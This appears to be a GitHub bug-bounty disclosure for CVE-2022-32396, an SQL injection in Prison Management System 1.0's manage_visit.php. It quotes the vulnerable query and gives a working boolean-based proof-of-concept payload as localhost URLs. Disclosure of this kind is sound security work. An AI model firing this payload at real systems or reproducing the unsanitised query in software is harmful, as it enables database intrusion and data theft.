Headline
CVE-2022-32396: BugBounty/cve-2022-32396.md at main · Dyrandy/BugBounty
Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the ‘id’ parameter at /pms/admin/visits/manage_visit.php:4
CVE-2022-32396****Info****Prison Management System 1.0 - SQL Injection
****Vendor Homepage : https://www.sourcecodester.com/
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET[‘id’] in /pms/admin/visits/manage_visit.php:4
$qry = $conn->query("SELECT * from `visit_list` where id = ‘{$_GET[‘id’]}’ ");
PoC
Payload :
Error Based
http://localhost/pms/admin/visits/manage_visit.php?id=1’-if(database()=’pms_db’,0,1)%23
- True : http://localhost/pms/admin/visits/manage_visit.php?id=1’-if(database()=’pms_db’,0,1)%23
- False : http://localhost/pms/admin/visits/manage_visit.php?id=1’-if(database()=’wrong’,0,1)%23